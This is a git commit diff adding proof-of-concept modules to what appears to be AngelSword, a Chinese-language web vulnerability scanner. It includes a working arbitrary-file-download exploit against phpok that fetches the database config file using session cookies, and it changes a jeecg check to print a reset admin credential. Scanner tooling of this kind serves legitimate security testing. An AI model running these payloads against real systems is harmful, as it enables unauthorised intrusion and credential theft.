add poc

2017-12-14 00:09:05 +08:00
parent a99eca3e4d
commit cb5e2f0692
6 changed files with 54 additions and 2 deletions
--- a/README.md
+++ b/README.md
@@ -33,6 +33,9 @@ pymongo

 3.所有POC均为开源，以后也一直如此，供大家参考和学习。如果有提供POC的朋友可以私发👇👇邮箱。

+# 增加功能
+[+] 增加针对登录后的poc检测，在AngelSword目录下新建cookies.txt文件，将Cookie的值粘贴进去。维持cookie的poc带有标识"需要cookies文件"。
+
 # bugs
 hanmengzi1993@gmail.com

--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -6,6 +6,10 @@ referer: unknow
 author: Lucifer
 description: 包含所有cms漏洞类型，封装成一个模块
 '''
+
+#phpok vulns
+from cms.phpok.phpok_res_action_control_filedownload import phpok_res_action_control_filedownload_BaseVerify
+
 #typecho vuls
 from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify

--- a/cms/jeecg/jeecg_pwd_reset.py
+++ b/cms/jeecg/jeecg_pwd_reset.py
@@ -24,7 +24,7 @@ class jeecg_pwd_reset_BaseVerify:
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"loginController.do?pwdInit" in req.text:
-                cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl, "red")
+                cprint("[+]存在jeecg 重置admin密码漏洞...(高危)\tpayload: "+vulnurl+"\tadmin:123456", "red")

        except:
            cprint("[-] "+__file__+"====>连接超时", "cyan")
@@ -32,4 +32,4 @@ class jeecg_pwd_reset_BaseVerify:
 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = jeecg_pwd_reset_BaseVerify(sys.argv[1])
-    testVuln.run()
+    testVuln.run()
--- a/cms/phpok/init.py
+++ b/cms/phpok/init.py
--- a/cms/phpok/phpok_res_action_control_filedownload.py
+++ b/cms/phpok/phpok_res_action_control_filedownload.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: phpok res_action_control.php 任意文件下载(需要cookies文件)
+referer: unknown
+author: Lucifer
+description: 参数file未经过滤进入到下载方法导致任意文件下载。
+'''
+import sys
+import json
+import requests
+import warnings
+from termcolor import cprint
+
+class phpok_res_action_control_filedownload_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php"
+        vulnurl = self.url + payload
+        try:
+            f =  open(r'cookies.txt', 'r')
+            cookies = {}
+            for line in f.read().split(";"):
+                name, value = line.strip().split("=",1)
+                cookies[name]=value
+        except:
+            pass
+        try:
+            req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False)
+            if r"<?php" in req.text and r"host" in req.text:
+                cprint("[+]存在phpok res_action_control.php 任意文件下载(需要cookies文件)漏洞...(高危)\tpayload: "+vulnurl+"\ncookies:"+json.dumps(cookies, indent=4), "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/pocdb.py
+++ b/pocdb.py
@@ -24,6 +24,7 @@ class pocdb_pocs:
            "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url),
        }
        self.cmspocdict = {
+            "phpok res_action_control.php 任意文件下载(需要cookies文件)":phpok_res_action_control_filedownload_BaseVerify(url),
            "jeecg 重置admin密码":jeecg_pwd_reset_BaseVerify(url),
            "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url),
            "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),